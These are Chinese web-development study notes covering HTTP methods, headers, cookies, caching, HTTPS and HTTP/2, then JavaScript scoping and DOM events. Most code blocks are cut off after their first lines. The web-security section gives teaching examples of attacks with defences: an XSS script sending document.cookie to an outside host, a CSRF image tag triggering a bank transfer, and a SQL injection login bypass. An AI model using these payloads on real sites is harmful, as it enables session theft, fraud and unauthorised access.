黄金守则第一条
js没有块级作用域(你可以自己闭包或其他方法实现),只有函数级作用域,函数外面的变量函数里面可以找到,函数里面的面找不到。
1 | var a = 10; |
URI 包含 URL 和 URN,目前 WEB 只有 URL 比较流行,所以见到的基本都是 URL。
客户端发送的 请求报文 第一行为请求行,包含了方法字段。
获取资源
当前网络请求中,绝大部分使用的是 GET 方法。
传输实体主体
POST 主要目的不是获取资源,而是传输存储在内容实体中的数据。
GET 和 POST 的请求都能使用额外的参数,但是 GET 的参数是以查询字符串出现在 URL 中,而 POST 的参数存储在内容实体。
GET 的传参方式相比于 POST 安全性较差,因为 GET 传的参数在 URL 中是可见的,可能会泄露私密信息。并且 GET 只支持 ASCII 字符,如果参数为中文则可能会出现乱码,而 POST 支持标准字符集。
GET 和 POST 的另一个区别是,使用 GET 方法,浏览器会把 HTTP Header 和 Data 一并发送出去,服务器响应 200(OK)并返回数据。而使用 POST 方法,浏览器先发送 Header,服务器响应 100(Continue)之后,浏览器再发送 Data,最后服务器响应 200(OK)并返回数据。
1 | GET /test/demo_form.asp?name1=value1&name2=value2 HTTP/1.1 |
1 | POST /test/demo_form.asp HTTP/1.1 |
获取报文首部
和 GET 方法一样,但是不返回报文实体主体部分。
主要用于确认 URL 的有效性以及资源更新的日期时间等。
上传文件
由于自身不带验证机制,任何人都可以上传文件,因此存在安全性问题,一般不使用该方法。
1 | PUT /new.html HTTP/1.1 |
对资源进行部分修改
PUT 也可以用于修改资源,但是只能完全替代原始资源,PATCH 允许部分修改。
1 | PATCH /file.txt HTTP/1.1 |
删除文件
与 PUT 功能相反,并且同样不带验证机制。
1 | DELETE /file.html HTTP/1.1 |
查询支持的方法
查询指定的 URL 能够支持的方法。
会返回 Allow: GET, POST, HEAD, OPTIONS 这样的内容。
要求用隧道协议连接代理
要求在与代理服务器通信时建立隧道,使用 SSL(Secure Sockets Layer,安全套接层)和 TLS(Transport Layer Security,传输层安全)协议把通信内容加密后经网络隧道传输。
1 | CONNECT www.example.com:443 HTTP/1.1 |
追踪路径
服务器会将通信路径返回给客户端。
发送请求时,在 Max-Forwards 首部字段中填入数值,每经过一个服务器就会减 1,当数值为 0 时就停止传输。
通常不会使用 TRACE,并且它容易受到 XST 攻击(Cross-Site Tracing,跨站追踪),因此更不会去使用它。
服务器返回的 响应报文 中第一行为状态行,包含了状态码以及原因短语,用来告知客户端请求的结果。
状态码 | 类别 | 原因短语 |
---|---|---|
1XX | Informational(信息性状态码) | 接收的请求正在处理 |
2XX | Success(成功状态码) | 请求正常处理完毕 |
3XX | Redirection(重定向状态码) | 需要进行附加操作以完成请求 |
4XX | Client Error(客户端错误状态码) | 服务器无法处理请求 |
5XX | Server Error(服务器错误状态码) | 服务器处理请求出错 |
200 OK
204 No Content :请求已经成功处理,但是返回的响应报文不包含实体的主体部分。一般在只需要从客户端往服务器发送信息,而不需要返回数据时使用。
206 Partial Content :表示客户端进行了范围请求。响应报文包含由 Content-Range 指定范围的实体内容。
301 Moved Permanently :永久性重定向
302 Found :临时性重定向
303 See Other :和 302 有着相同的功能,但是 303 明确要求客户端应该采用 GET 方法获取资源。
注:虽然 HTTP 协议规定 301、302 状态下重定向时不允许把 POST 方法改成 GET 方法,但是大多数浏览器都会在 301、302 和 303 状态下的重定向把 POST 方法改成 GET 方法。
304 Not Modified :如果请求报文首部包含一些条件,例如:If-Match,If-ModifiedSince,If-None-Match,If-Range,If-Unmodified-Since,如果不满足条件,则服务器会返回 304 状态码。
307 Temporary Redirect :临时重定向,与 302 的含义类似,但是 307 要求浏览器不会把重定向请求的 POST 方法改成 GET 方法。
400 Bad Request :请求报文中存在语法错误。
401 Unauthorized :该状态码表示发送的请求需要有认证信息(BASIC 认证、DIGEST 认证)。如果之前已进行过一次请求,则表示用户认证失败。
403 Forbidden :请求被拒绝,服务器端没有必要给出拒绝的详细理由。
404 Not Found
500 Internal Server Error :服务器正在执行请求时发生错误。
503 Service Unavilable :服务器暂时处于超负载或正在进行停机维护,现在无法处理请求。
有 4 种类型的首部字段:通用首部字段、请求首部字段、响应首部字段和实体首部字段。
各种首部字段及其含义如下(不需要全记,仅供查阅):
首部字段名 | 说明 |
---|---|
Cache-Control | 控制缓存的行为 |
Connection | 控制不再转发给代理的首部字段、管理持久连接 |
Date | 创建报文的日期时间 |
Pragma | 报文指令 |
Trailer | 报文末端的首部一览 |
Transfer-Encoding | 指定报文主体的传输编码方式 |
Upgrade | 升级为其他协议 |
Via | 代理服务器的相关信息 |
Warning | 错误通知 |
首部字段名 | 说明 |
---|---|
Accept | 用户代理可处理的媒体类型 |
Accept-Charset | 优先的字符集 |
Accept-Encoding | 优先的内容编码 |
Accept-Language | 优先的语言(自然语言) |
Authorization | Web 认证信息 |
Expect | 期待服务器的特定行为 |
From | 用户的电子邮箱地址 |
Host | 请求资源所在服务器 |
If-Match | 比较实体标记(ETag) |
If-Modified-Since | 比较资源的更新时间 |
If-None-Match | 比较实体标记(与 If-Match 相反) |
If-Range | 资源未更新时发送实体 Byte 的范围请求 |
If-Unmodified-Since | 比较资源的更新时间(与 If-Modified-Since 相反) |
Max-Forwards | 最大传输逐跳数 |
Proxy-Authorization | 代理服务器要求客户端的认证信息 |
Range | 实体的字节范围请求 |
Referer | 对请求中 URI 的原始获取方 |
TE | 传输编码的优先级 |
User-Agent | HTTP 客户端程序的信息 |
首部字段名 | 说明 |
---|---|
Accept-Ranges | 是否接受字节范围请求 |
Age | 推算资源创建经过时间 |
ETag | 资源的匹配信息 |
Location | 令客户端重定向至指定 URI |
Proxy-Authenticate | 代理服务器对客户端的认证信息 |
Retry-After | 对再次发起请求的时机要求 |
Server | HTTP 服务器的安装信息 |
Vary | 代理服务器缓存的管理信息 |
WWW-Authenticate | 服务器对客户端的认证信息 |
首部字段名 | 说明 |
---|---|
Allow | 资源可支持的 HTTP 方法 |
Content-Encoding | 实体主体适用的编码方式 |
Content-Language | 实体主体的自然语言 |
Content-Length | 实体主体的大小 |
Content-Location | 替代对应资源的 URI |
Content-MD5 | 实体主体的报文摘要 |
Content-Range | 实体主体的位置范围 |
Content-Type | 实体主体的媒体类型 |
Expires | 实体主体过期的日期时间 |
Last-Modified | 资源的最后修改日期时间 |
HTTP 协议是无状态的,主要是为了让 HTTP 协议尽可能简单,使得它能够处理大量事务。HTTP/1.1 引入 Cookie 来保存状态信息。
Cookie 是服务器发送给客户端的数据,该数据会被保存在浏览器中,并且客户端的下一次请求报文会包含该数据。通过 Cookie 可以让服务器知道两个请求是否来自于同一个客户端,从而实现保持登录状态等功能。
服务器发送的响应报文包含 Set-Cookie 字段,客户端得到响应报文后把 Cookie 内容保存到浏览器中。
1 | HTTP/1.0 200 OK |
客户端之后发送请求时,会从浏览器中读出 Cookie 值,在请求报文中包含 Cookie 字段。
1 | GET /sample_page.html HTTP/1.1 |
1 | Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; |
属性 | 说明 |
---|---|
NAME=VALUE | 赋予 Cookie 的名称和其值(必需项) |
expires=DATE | Cookie 的有效期(若不明确指定则默认为浏览器关闭前为止) |
path=PATH | 将服务器上的文件目录作为 Cookie 的适用对象(若不指定则默认为文档所在的文件目录) |
domain=域名 | 作为 Cookie 适用对象的域名(若不指定则默认为创建 Cookie 的服务器的域名) |
Secure | 仅在 HTTPs 安全通信时才会发送 Cookie |
HttpOnly | 加以限制,使 Cookie 不能被 JavaScript 脚本访问 |
Session 是服务器用来跟踪用户的一种手段,每个 Session 都有一个唯一标识:Session ID。当服务器创建了一个 Session 时,给客户端发送的响应报文包含了 Set-Cookie 字段,其中有一个名为 sid 的键值对,这个键值对就是 Session ID。客户端收到后就把 Cookie 保存在浏览器中,并且之后发送的请求报文都包含 Session ID。HTTP 就是通过 Session 和 Cookie 这两种方式一起合作来实现跟踪用户状态的,Session 用于服务器端,Cookie 用于客户端。
会使用 URL 重写技术,在 URL 后面加上 sid=xxx 。
网站脚本会自动从保存在浏览器中的 Cookie 读取用户名和密码,从而实现自动填写。
但是如果 Set-Cookie 指定了 HttpOnly 属性,就无法通过 Javascript 脚本获取 Cookie 信息,这是出于安全性考虑。
HTTP 通过 Cache-Control 首部字段来控制缓存。
1 | Cache-Control: private, max-age=0, no-cache |
该指令出现在请求报文的 Cache-Control 字段中,表示缓存服务器需要先向原服务器验证缓存资源是否过期;
该指令出现在响应报文的 Cache-Control 字段中,表示缓存服务器在进行缓存之前需要先验证缓存资源的有效性。
该指令表示缓存服务器不能对请求或响应的任何一部分进行缓存。
no-cache 不表示不缓存,而是缓存之前需要先进行验证,no-store 才是不进行缓存。
该指令出现在请求报文的 Cache-Control 字段中,如果缓存资源的缓存时间小于该指令指定的时间,那么就能接受该缓存。
该指令出现在响应报文的 Cache-Control 字段中,表示缓存资源在缓存服务器中保存的时间。
Expires 字段也可以用于告知缓存服务器该资源什么时候会过期。在 HTTP/1.1 中,会优先处理 Cache-Control : max-age 指令;而在 HTTP/1.0 中,Cache-Control : max-age 指令会被忽略掉。
当浏览器访问一个包含多张图片的 HTML 页面时,除了请求访问 HTML 页面资源,还会请求图片资源,如果每进行一次 HTTP 通信就要断开一次 TCP 连接,连接建立和断开的开销会很大。持久连接只需要建立一次 TCP 连接就能进行多次 HTTP 通信。
持久连接需要使用 Connection 首部字段进行管理。HTTP/1.1 开始 HTTP 默认是持久化连接的,如果要断开 TCP 连接,需要由客户端或者服务器端提出断开,使用 Connection : close;而在 HTTP/1.1 之前默认是非持久化连接的,如果要维持持续连接,需要使用 Connection : Keep-Alive。
管线化方式 可以同时发送多个请求和响应,而不需要发送一个请求然后等待响应之后再发下一个请求。
编码(Encoding)主要是为了对实体进行压缩。常用的编码有:gzip、compress、deflate、identity,其中 identity 表示不执行压缩的编码格式。
Chunked Transfer Coding,可以把数据分割成多块,让浏览器逐步显示页面。
一份报文主体内可含有多种类型的实体同时发送,每个部分之间用 boundary 字段定义的分隔符进行分隔,每个部分都可以有首部字段。
例如,上传多个表单时可以使用如下方式:
1 | Content-Type: multipart/form-data; boundary=AaB03x |
如果网络出现中断,服务器只发送了一部分数据,范围请求使得客户端能够只请求未发送的那部分数据,从而避免服务器端重新发送所有数据。
在请求报文首部中添加 Range 字段指定请求的范围,请求成功的话服务器发送 206 Partial Content 状态。
1 | GET /z4d4kWk.jpg HTTP/1.1 |
1 | HTTP/1.1 206 Partial Content |
通过内容协商返回最合适的内容,例如根据浏览器的默认语言选择返回中文界面还是英文界面。
涉及以下首部字段:Accept、Accept-Charset、Accept-Encoding、Accept-Language、Content-Language。
使用虚拟主机技术,使得一台服务器拥有多个域名,并且在逻辑上可以看成多个服务器。
代理服务器接受客户端的请求,并且转发给其它服务器。
使用代理的主要目的是:缓存、网络访问控制以及访问日志记录。
代理服务器分为正向代理和反向代理两种,用户察觉得到正向代理的存在,而反向代理一般位于内部网络中,用户察觉不到。
与代理服务器不同的是,网关服务器会将 HTTP 转化为其它协议进行通信,从而请求其它非 HTTP 服务器的服务。
使用 SSL 等加密手段,为客户端和服务器之间建立一条安全的通信线路。隧道本身不去解析 HTTP 请求。
HTTP 有以下安全性问题:
HTTPs 并不是新协议,而是 HTTP 先和 SSL(Secure Sockets Layer)通信,再由 SSL 和 TCP 通信。也就是说使用了隧道进行通信。
通过使用 SSL,HTTPs 具有了加密、认证和完整性保护。
Symmetric-Key Encryption,加密的加密和解密使用同一密钥。
Public-Key Encryption,使用一对密钥用于加密和解密,分别为公开密钥和私有密钥。公开密钥所有人都可以获得,通信发送方获得接收方的公开密钥之后,就可以使用公开密钥进行加密,接收方收到通信内容后使用私有密钥解密。
HTTPs 采用混合的加密机制,使用公开密钥加密用于传输对称密钥,之后使用对称密钥加密进行通信。(下图中的 Session Key 就是对称密钥)
通过使用 证书 来对通信方进行认证。
数字证书认证机构(CA,Certificate Authority)是客户端与服务器双方都可信赖的第三方机构。服务器的运营人员向 CA 提出公开密钥的申请,CA 在判明提出申请者的身份之后,会对已申请的公开密钥做数字签名,然后分配这个已签名的公开密钥,并将该公开密钥放入公开密钥证书后绑定在一起。
进行 HTTPs 通信时,服务器会把证书发送给客户端,客户端取得其中的公开密钥之后,先进行验证,如果验证通过,就可以开始通信。
使用 OpenSSL 这套开源程序,每个人都可以构建一套属于自己的认证机构,从而自己给自己颁发服务器证书。浏览器在访问该服务器时,会显示“无法确认连接安全性”或“该网站的安全证书存在问题”等警告消息。
SSL 提供报文摘要功能来验证完整性。
直接攻击服务器,具有代表性的有 SQL 注入和 OS 命令注入。
设下圈套,让用户发送有攻击代码的 HTTP 请求,用户会泄露 Cookie 等个人信息,具有代表性的有跨站脚本攻击和跨站请求伪造。
跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript。利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。攻击成功后,攻击者可能得到更高的权限(如执行一些操作)、私密网页内容、会话和 Cookie 等各种内容。
例如有一个论坛网站,攻击者可以在上面发表以下内容:
1 | <script>location.href="//domain.com/?c=" + document.cookie</script> |
之后该内容可能会被渲染成以下形式:
1 | <p><script>location.href="//domain.com/?c=" + document.cookie</script></p> |
另一个用户浏览了含有这个内容的页面将会跳往 domain.com 并携带了当前作用域的 Cookie。如果这个论坛网站通过 Cookie 管理用户登录状态,那么攻击者就可以通过这个 Cookie 登录被攻击者的账号了。
(一)过滤特殊字符
许多语言都提供了对 HTML 的过滤:
(二)指定 HTTP 的 Content-Type
通过这种方式,可以避免内容被当成 HTML 解析,比如 PHP 语言可以使用以下代码:
1 | <?php |
跨站点请求伪造(Cross-site request forgery,CSRF),是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了 Web 中用户身份验证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。
XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。
假如一家银行用以执行转账操作的 URL 地址如下:
1 | http://www.examplebank.com/withdraw?account=AccoutName&amount=1000&for=PayeeName。 |
那么,一个恶意攻击者可以在另一个网站上放置如下代码:
1 | <img src="http://www.examplebank.com/withdraw?account=Alice&amount=1000&for=Badman">。 |
如果有账户名为 Alice 的用户访问了恶意站点,而她之前刚访问过银行不久,登录信息尚未过期,那么她就会损失 1000 资金。
这种恶意的网址可以有很多种形式,藏身于网页中的许多地方。此外,攻击者也不需要控制放置恶意网址的网站。例如他可以将这种地址藏在论坛,博客等任何用户生成内容的网站中。这意味着如果服务器端没有合适的防御措施的话,用户即使访问熟悉的可信网站也有受攻击的危险。
透过例子能够看出,攻击者并不能通过 CSRF 攻击来直接获取用户的账户控制权,也不能直接窃取用户的任何信息。他们能做到的,是欺骗用户浏览器,让其以用户的名义执行操作。
(一)检查 Referer 字段
HTTP 头中有一个 Referer 字段,这个字段用以标明请求来源于哪个地址。在处理敏感数据请求时,通常来说,Referer 字段应和请求的地址位于同一域名下。
这种办法简单易行,工作量低,仅需要在关键访问处增加一步校验。但这种办法也有其局限性,因其完全依赖浏览器发送正确的 Referer 字段。虽然 HTTP 协议对此字段的内容有明确的规定,但并无法保证来访的浏览器的具体实现,亦无法保证浏览器没有安全漏洞影响到此字段。并且也存在攻击者攻击某些浏览器,篡改其 Referer 字段的可能。
(二)添加校验 Token
由于 CSRF 的本质在于攻击者欺骗用户去访问自己设置的地址,所以如果要求在访问敏感数据请求时,要求用户浏览器提供不保存在 cookie 中,并且攻击者无法伪造的数据作为校验,那么攻击者就无法再执行 CSRF 攻击。这种数据通常是表单中的一个数据项。服务器将其生成并附加在表单中,其内容是一个伪乱数。当客户端通过表单提交请求时,这个伪乱数也一并提交上去以供校验。正常的访问时,客户端浏览器能够正确得到并传回这个伪乱数,而通过 CSRF 传来的欺骗性攻击中,攻击者无从事先得知这个伪乱数的值,服务器端就会因为校验 token 的值为空或者错误,拒绝这个可疑请求。
服务器上的数据库运行非法的 SQL 语句。
例如一个网站登录验证的 SQL 查询代码为:
1 | strSQL = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');" |
如果填入以下内容:
1 | userName = "1' OR '1'='1"; |
那么 SQL 查询字符串为:
1 | strSQL = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');" |
此时无需验证通过就能执行以下查询:
1 | strSQL = "SELECT * FROM users;" |
(denial-of-service attack,DoS),亦称洪水攻击,其目的在于使目标电脑的网络或系统资源耗尽,使服务暂时中断或停止,导致其正常用户无法访问。
(distributed denial-of-service attack,DDoS),指攻击者使用网络上两个或以上被攻陷的电脑作为“僵尸”向特定的目标发动“拒绝服务”式攻击。
HTTP/1.1 新增了以下内容:
HTTP/2.0 使用多路复用技术,使用同一个 TCP 连接来处理多个请求。
HTTP/1.1 的首部带有大量信息,而且每次都要重复发送。HTTP/2.0 要求通讯双方各自缓存一份首部字段表,从而避免了重复传输。
在客户端请求一个资源时,会把相关的资源一起发送给客户端,客户端就不需要再次发起请求了。例如客户端请求 index.html 页面,服务端就把 index.js 一起发给客户端。
HTTP/1.1 的解析是基于文本的,而 HTTP/2.0 采用二进制格式。
提到 JS 中声明变量的方式,必然提及var、let、const、function 四个关键词,其中 var、function 声明的变量会发生变量提升。
var 是初学者常用的声明变量的方式,简单的,声明任何数据都可以用 var :
1 | var num = 1;// declare a number |
以上声明变量的方式避免不了会发生变量提升,什么意思呢?以正常的思维来看,如果一个变量还未声明,那么该变量就不可用。但是 JS 中使用 var 声明的变量会发生提升,即 JS 引擎在解释语句时,遇到 var 声明的变量会把该变量放置于当前作用域的最前面,同时初始化为 undefined,且函数的提升在变量之前。举例:
1 | getA(); |
为什么会打印出 undefined 呢?因为 a 发生了变量提升,且在 a 被赋值之前就使用了 a,此时 a 的值为 undefined,该段代码执行时的实际情形如下:
1 | function getA(){ |
再来看下面的一种情况:
1 | var a = 1; |
那么上面的代码执行时的实际情形如下:
1 | function getA(){ |
上段代码中第一次打印出的为什么不是 1 呢?如果不清楚变量提升以及作用域那么很容易犯这种低级错误。上段代码在执行时, getA 函数中首先将 var a 提升至 当前作用域 的最前面,即 getA 函数中的最前面。代码在执行时如何取值呢?当然是先看自己当前作用域有没有该值,如果有,就用当前作用域的值,如果没有,则顺着作用域链向上找,直到找到该变量为止。如何让上段代码输出 1 以及 2 该怎么办呢?很简单,去掉 getA 函数中的 var 即可。
1 | var a = 1; |
因为 getA 函数中没有 a,则顺着作用域链向上找,发现函数外有一个 a 变量,则打印出该变量中存储的值 1 ,此时打印出的 a 是函数外部的 a,再执行 a = 2 时,全局的 a 被赋值为 2。
那么问题来了:声明变量不加关键字一定会声明为全局变量吗?
答:如果函数外部没有同名的全局变量的话,那么就会生成全局变量。
举例一:
1 | function getA(){ |
第一次打印出 a 时,函数内部没有声明的变量 a,顺着作用域链找也没有 a,就会抛出错误,第二次打印出 a 的时候,函数 getA 中声明了全局变量 a,会打印出 1。当然上述代码抛出错误之后,后面的语句不会执行,可以注释掉 getA 函数中的第一条语句再运行。
举例二:
1 | a = 1; |
上段代码中,getA 函数外部有一个全局变量 a,getA 中要声明与全局变量同名的变量时没有加变量关键字,因此 a = 2 的作用为将全局变量 a 赋值为 2。因此可以看出,声明变量时一定要加上变量关键字,否则会产生预料之外的错误。
如果一个变量没有定义就可以使用,是非常令人困惑的。针对这种情况,ES6 推出了声明变量的新关键字 let 以及 const 。
let 关键字声明的变量是不会发生变量提升的,将之前的代码中的 var 改为 let 看看结果:
1 | getA(); |
上面的代码执行实际情况为:
1 | function getA(){ |
在函数内部用 let 声明变量是一样的。
1 | let a = 1; |
上段代码也很好理解,关键是要理解作用域。
那么如果上段代码中想要先打印出函数外 a 的值,再声明函数内部的私有变量 a 可以吗?
答案是不可以,因为 let 解决了变量提升这个问题时,同时带来了另一个问题,那就是临时死区(Temporal Dead Zone, TDZ)。通俗的理解就是,若当前作用域中使用 let 关键字定义了与作用域外部同名的变量,那么在当前作用域内,定义同名变量之前,都不可以使用该变量,即使你的本意是想先使用外部同名变量,再定义内部同名变量。
1 | let a = 1; |
const 与 let 类似,都没有变量提升,都存在临时死区。不同的是,const 声明的变量,只能在声明的同时初始化,之后是不允许赋值的(Object 类型数据除外),否则会报错。若没有在声明的同时初始化,也会报错。
1 | const a = 1; |
那么看下面的代码:
1 | const obj = { |
为什么 const 声明的变量又可以修改其中的数据了呢?因为 obj 是个复杂数据,不是简单数据。conts 声明变量的本质是变量中的数据紧致修改,为什么复杂数据可以更改呢?因为 const 声明的变量中存储的是复杂对象的引用地址,而不是真真的数据,仅仅是数据的地址。因此在使用 const 声明了变量来引用复杂数据之后,还是可以修改该复杂数据的值。复杂数据有哪些呢?array Object、object Object、function Object 等。不建议使用 const 声明复杂数据,因为如果稍加不注意,就会更改了不想被改变的复杂数据的值。建议使用 const 声明简单数据,同时变量名大写。为什么简单数据的更改就能检测出来呢?因为简单数据是直接存储在栈内存中的,而不是像复杂对象,栈内存中存储的是堆内存中的引用地址。
说起作用域,ES6 新引入了一个块级作用域,之前 ES5 只有全局作用域与函数作用域。
在 ES6 之前,如果想要定义一个局部变量/私有变量该怎么办呢?答案是利用函数作用域。如果不想定义具名函数,浪费命名空间的话,可以使用立即执行函数(Immediately Invoked Function Expression, IIFE),如何定义立即执行函数?以下可作参考:
1 | ( function(){ code } ).call(); // can return value |
以上几种都是 IIFE,值得注意的是前三种是可以有返回值的。数据可以通过括号传递。例如:
1 | let a = (function (num1, num2){ |
ES6 中引入了块级作用域,那么声明私有变量/局部变量不用再利用函数作用域了,直接使用块级作用域 {} 即可,值得注意的是在花括号内使用 var 是没有用的,因为 ES5 没有块级作用域的概念。
1 | // in ES6 |
那么由作用域可以引入一个经典问题,问以下代码的执行完结果是什么?
1 | for(var i = 0; i < 5; i++){ |
很多人都知道会在 1s 之后打印出 5 个 5 。为什么呢?可以结合变量提升和作用域进行分析。由于 var 没有块级作用域,因此 var i 会声明 i 为全局变量,以上代码执行时情况如下:
1 | { |
进一步拆分:
1 | var i; |
那么 i = 5 是怎么来的呢?因为 i 为全局变量,在不满足循环条件的时候 i === 5,所以在 1s 之后打印出 5 个 5。那么如何打印出 0、1、2、3、4 呢?最简单的方法,将 var 改为 let:
1 | for(let i = 0; i < 5; i++){ |
将改为 let 的代码进行拆分,如下:
1 | { |
由于使用了 let,因此花括号为块级作用域,内部的 i 为局部变量,延时函数在执行时,会优先在当前作用域访问 i,因此会打印出 0、1、2、3、4 。 此外还有其他方法,那就是利用立即执行函数:
1 | for(var i = 0; i < 5; i++){ |
这其中要涉及到事件队列,setTimeout 将第一个参数推入 Event queue 时,发现是个立即执行函数,则立即执行,打印出当前的 i 值。或者还可以改写如下:
1 | for(var i = 0; i < 5; i++){ |
该方法将通知 Web 浏览器不要执行与事件关联的默认动作(如果存在这样的动作)。例如,如果 type 属性是 “submit”,在事件传播的任意阶段可以调用任意的事件句柄,通过调用该方法,可以阻止提交表单。注意,如果 Event 对象的 cancelable 属性是 fasle,那么就没有默认动作,或者不能阻止默认动作。无论哪种情况,调用该方法都没有作用。
该方法将通知 Web 浏览器不要执行与事件关联的默认动作(如果存在这样的动作)。
例如,如果 type 属性是 “submit”,在事件传播的任意阶段可以调用任意的事件句柄,通过调用该方法,可以阻止提交表单。
注意,如果 Event 对象的 cancelable 属性是 fasle,那么就没有默认动作,或者不能阻止默认动作。无论哪种情况,调用该方法都没有作用。
该方法将停止事件的传播,阻止它被分派到其他 Document 节点。在事件传播的任何阶段都可以调用它。注意,虽然该方法不能阻止同一个 Document 节点上的其他事件句柄被调用,但是它可以阻止把事件分派到其他节点
该方法将停止事件的传播,阻止它被分派到其他 Document 节点。在事件传播的任何阶段都可以调用它。
注意:虽然该方法不能阻止同一个 Document 节点上的其他事件句柄被调用,但是它可以阻止把事件分派到其他节点。
event是DOM的事件方法,所以不是单独使用,比如指定DOM
1.元素节点有tagName 、nodeName 、localName属性;其中tagName 、nodeName相同,都是大写,localName是小写;
其他节点只有nodeName 、localName属性,其中属性节点localName和nodeName相同,文本节点localName为null;
2.childNodes是指元素的所有直接子节点,包括元素节点、文本节点,不包括属性节点
children 返回元素的所有直接子的元素节点
二者区别在于后者不包括文本节点
childElementCount 表示的是子元素节点的个数,等于children的length;
3.attibutes 存有html属性,包括class、id等
properties
4.获取元素节点内的所有文本值
innerText IE和chrome支持
textContent 高版本浏览器支持
5.outerHTML 与 innerHTML的区别在与是否包换元素本身,包括就是outerHtml;